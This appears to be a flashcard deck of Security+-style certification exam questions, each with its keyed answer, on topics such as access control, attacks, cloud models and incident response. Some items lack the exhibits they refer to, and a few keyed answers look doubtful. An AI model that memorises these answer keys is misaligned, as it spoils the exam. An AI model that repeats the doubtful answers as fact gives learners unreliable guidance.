    QUESTION 938 Which of the following best describes the situation where a successfully onboarded employee who is using a fingerprint reader is denied access at the company's main gate?

    False rejection

  • 54

    QUESTION 975 A security administrator examines the ARP table of an access switch and sees the following output:

    MAC flooding on fa0/2 port

  • 55

    QUESTION 939 Which of the following should customers who are involved with UI developer agreements be concerned with when considering the use of these products on highly sensitive projects?

    Outsourced code development

  • 56

    QUESTION 976 Which of the following documents specifies what to do in the event of catastrophic loss of a physical or virtual system?

    Disaster recovery plan

  • 57

    QUESTION 940 A police department is using the cloud to share information with city officials. Which of the following cloud models describes this scenario?

    Community

  • 58

    QUESTION 941 A user reports that a bank's website no longer displays a padlock symbol. A security analyst views the user's screen and notices the connection is using HTTP instead of HTTPS. Which of the following attacks is most likely occurring?

    SSL stripping

  • 59

    QUESTION 977 Which of the following roles is responsible for defining the protection type and classification type for a given set of files?

    Data owner

  • 60

    QUESTION 942 A data center has experienced an increase in under-voltage events following electrical grid maintenance outside the facility. These events are leading to occasional losses of system availability. Which of the following would be the most cost-effective solution for the data center to implement?

    Uninterruptible power supplies with battery backup

  • 61

    QUESTION 978 An employee's company email is configured with conditional access and requires that MFA is enabled and used. An example of MFA is a phone call and:

    an authentication application

  • 62

    QUESTION 943 A security architect is designing a remote access solution for a business partner. The business partner needs to access one Linux server at the company. The business partner wants to avoid managing a password for authentication and additional software installation. Which of the following should the architect recommend?

    SSH key

  • 63

    QUESTION 979 Which of the following is a security implication of newer ICS devices that are becoming more common in corporations?

    Devices with cellular communication capabilities bypass traditional network security controls

  • 64

    QUESTION 944 A security analyst is assisting a team of developers with best practices for coding. The security analyst would like to defend against the use of SQL injection attacks. Which of the following should the security analyst recommend first?

    Input validation

  • 65

    QUESTION 980 While troubleshooting service disruption on a mission-critical server, a technician discovered the user account that was configured to run automated processes was disabled because the user's password failed to meet password complexity requirements. Which of the following would be the best solution to securely prevent future issues?

    Configuring a service account to run the processes

  • 66

    QUESTION 945 Cloud security engineers are planning to allow and deny access to specific features in order to increase data security. Which of the following cloud features is the most appropriate to ensure access is granted properly?

    Resource policies

  • 67

    QUESTION 981 A security analyst is assessing a newly developed web application by testing SQL injection, CSRF, and XML injection. Which of the following frameworks should the analyst consider?

    OWASP

  • 68

    A security operations technician is searching the log named /var/messages for any events that were associated with a workstation with the IP address 10.1.1.1. Which of the following would provide this information?

    cat /var/messages | grep 10.1.1.1

  • 69

    QUESTION 982 A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access shared folders or other network resources. Which of the following types of attacks is the user most likely experiencing?

    Rogue access point

  • 70

    QUESTION 983 Which of the following procedures would be performed after the root cause of a security incident has been identified to help avoid future incidents from occurring?

    Lessons learned

  • 71

    image

    User-agent spoofing

  • 72

    QUESTION 984 A security administrator is integrating several segments onto a single network. One of the segments, which includes legacy devices, presents a significant amount of risk to the network. Which of the following would allow users to access the legacy devices without compromising the security of the entire network?

    Jump server

  • 73

    QUESTION 948 Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges?

    Lessons learned

  • 74

    QUESTION 985 Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity against their systems?

    Threat feeds

  • 75

    QUESTION 986 Which of the following types of disaster recovery plan exercises requires the least interruption to IT operations?

    Tabletop

  • 76

    QUESTION 987 Which of the following disaster recovery sites is the most cost effective to operate?

    Cold site

  • 77

    QUESTION 988 A security operations center wants to implement a solution that can execute files to test for malicious activity. The solution should provide a report of the files' activity against known threats. Which of the following should the security operations center implement?

    Cuckoo

  • 78

    QUESTION 989 A security administrator would like to ensure all cloud servers will have software preinstalled for facilitating vulnerability scanning and continuous monitoring. Which of the following concepts should the administrator utilize?

    Provisioning

  • 79

    QUESTION 990 A network architect wants a server to have the ability to retain network availability even if one of the network switches it is connected to goes down. Which of the following should the architect implement on the server to achieve this goal?

    Load balancing

  • 80

    QUESTION 991 A security administrator installed a new web server. The administrator did this to increase the capacity for an application due to resource exhaustion on another server. Which of the following algorithms should the administrator use to split the number of the connections on each server in half?

    Round-robin

  • 81

    QUESTION 992 Security analysts have noticed the network becomes flooded with malicious packets at specific times of the day. Which of the following should the analysts use to investigate this issue?

    Correlation dashboards

  • 82

    QUESTION 993 A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator's activities?

    Data processor

  • 83

    QUESTION 994 An attacker is targeting a company. The attacker notices that the company's employees frequently access a particular website. The attacker decides to infect the website with malware and hopes the employees' devices will also become infected. Which of the following techniques is the attacker using?

    Watering-hole attack

  • 84

    QUESTION 995 A digital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk. Which of the following techniques should the team use to obtain a sample of the malware binary?

    Image volatile memory

  • 85

    QUESTION 996 A website visitor is required to provide properly formatted information in a specific field on a website form. Which of the following security measures is most likely used for this mandate?

    Input validation

  • 86

    QUESTION 997 A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?

    Ensuring that port 53 has been explicitly allowed in the rule set

  • 87

    QUESTION 998 A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?

    Sensitive

  • 88

    QUESTION 999 A small business uses kiosks on the sales floor to display product information for customers. A security team discovers the kiosks use end-of-life operating systems. Which of the following is the security team most likely to document as a security implication of the current architecture?

    Patch availability

  • 89

    QUESTION 1000 During a security incident, the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9. A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network. Which of the following fulfills this request?

    access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

  • 90

    QUESTION 1001 Which of the following is the phase in the incident response process when a security analyst reviews roles and responsibilities?

    Preparation

  • 91

    QUESTION 1002 An administrator is reviewing a single server's security logs and discovers the following:

    Brute-force attack

  • 92

    QUESTION 1003 Which of the following can be used to identify potential attacker activities without affecting production servers?

    Honeypot

  • 93

    QUESTION 1004 A company wants the ability to restrict web access and monitor the websites that employees visit. Which of the following would best meet these requirements?

    Internet proxy

  • 94

    QUESTION 1005 A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon examining the logs, the analyst identifies a source IP address and blocks that address from communicating with the network. Even though the analyst is blocking this address, the attack is still ongoing and coming from a large number of different source IP addresses. Which of the following describes this type of attack?

    DDoS

  • 95

    QUESTION 1006 A company needs to centralize its logs to create a baseline and have visibility on its security events. Which of the following technologies will accomplish this objective?

    Security information and event management

  • 96

    QUESTION 1007 Two organizations are discussing a possible merger. Both organizations' Chief Financial Officers would like to safely share payroll data with each other to determine if the pay scales for different roles are similar at both organizations. Which of the following techniques would be best to protect employee data while allowing the companies to successfully share this information?

    Data masking

  • 97

    QUESTION 1008 A large retail store's network was breached recently, and this news was made public. The store did not lose any intellectual property, and no customer information was stolen. Although no fines were incurred as a result, the store lost revenue after the breach. Which of the following is the most likely reason for this issue?

    Reputation damage

  • 98

    QUESTION 1009 A government organization is developing an advanced AI defense system. Developers are using information collected from third-party providers. Analysts are noticing inconsistencies in the expected progress of the AI learning and attribute the outcome to a recent attack on one of the suppliers. Which of the following is the most likely reason for the inaccuracy of the system?

    Tainted training data

  • 99

    QUESTION 1010 A company's help desk has received calls about the wireless network being down and users being unable to connect to it. The network administrator says all access points are up and running. One of the help desk technicians notices the affected users are working in a building near the parking lot. Which of the following is the most likely reason for the outage?

    Someone near the building is jamming the signal.

  • 100

    QUESTION 1011 Which of the following can best protect against an employee inadvertently installing malware on a company system?

    Least privilege